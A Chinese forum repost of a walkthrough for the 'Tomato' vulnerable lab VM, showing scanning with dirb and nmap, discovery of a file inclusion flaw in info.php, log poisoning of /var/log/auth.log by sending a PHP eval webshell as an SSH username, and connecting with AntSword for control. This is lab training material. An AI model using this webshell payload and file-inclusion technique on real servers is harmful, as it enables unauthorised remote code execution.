玛卡巴卡的卡巴卡玛 发表于 2024-9-28 21:26:41

tomato-靶机渗透

tomato-靶机

一、安装靶机环境

下载双击.ova文件,写文件名路径导入
https://i-blog.csdnimg.cn/blog_migrate/52b9494fca4437051e356c9ba6c904ec.png
打开假造机用NAT模式
https://i-blog.csdnimg.cn/blog_migrate/4eeb20cb3130b44b68de77ece546987f.png
编辑–>假造网络编辑器查看IP段
https://i-blog.csdnimg.cn/blog_migrate/7b3ff1e014b61de12a5a06c3cebb12a2.png
二、信息收集

1.御剑端口扫描查找该假造机的IP
https://i-blog.csdnimg.cn/blog_migrate/522eca2b6927e86f1adc628f49cd5b2e.png
访问网站
https://i-blog.csdnimg.cn/blog_migrate/bf81d3c6184e3f7f9a53c9fe7644640a.png
扫目次
dirb http://192.168.30.130
https://i-blog.csdnimg.cn/blog_migrate/8c3d44fa695462c800cf58fc45519d65.png
收集到目次
/server-status
/antibot_image/
/index.html
访问/antibot_image目次
https://i-blog.csdnimg.cn/blog_migrate/de2bd28a7f3187be1aa5a100728c5baf.png
在目次下找到info.php
https://i-blog.csdnimg.cn/blog_migrate/5b81da3e2d5453dc4893b75109e17179.png
查到
根目录:/var/www/html
用户名:webmaster@localhost
查看info.php源代码,提示image参数用于文件包含
https://i-blog.csdnimg.cn/blog_migrate/5ddfcb0a624714e626ab2e1d1b3903e9.png
三、毛病渗透

写image参数=linux的系统文件,发现乐成表现,确定有文件包含毛病
https://i-blog.csdnimg.cn/blog_migrate/7d6b946e4dea920cc2dcf18a149bf063.png
2.发现端口没有全部扫描出来,利用这个命令扫描
nmap -A 192.168.30.130 -p-
https://i-blog.csdnimg.cn/blog_migrate/0bf3dd0c450d11da2c3b320b21058f47.png
2211是ssl的毗连端口
ssh '<?php @eval($_POST['cmd']);?>'@192.168.30.130 -p 2211
https://i-blog.csdnimg.cn/blog_migrate/eb7f5e1ec9ae1742e28262e41e77a497.png
然后在网页端查看ubuntu报错信息:/var/log/auth.log
http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

https://i-blog.csdnimg.cn/blog_migrate/a0f787daedb8f58443aab786871c8780.png
看到注入乐成,然后用蚁剑
URL地址
http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

https://i-blog.csdnimg.cn/blog_migrate/02f20f671e295f1aa5e82a9e3ae7509c.png
然后就可以控制整个文件

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: tomato-靶机渗透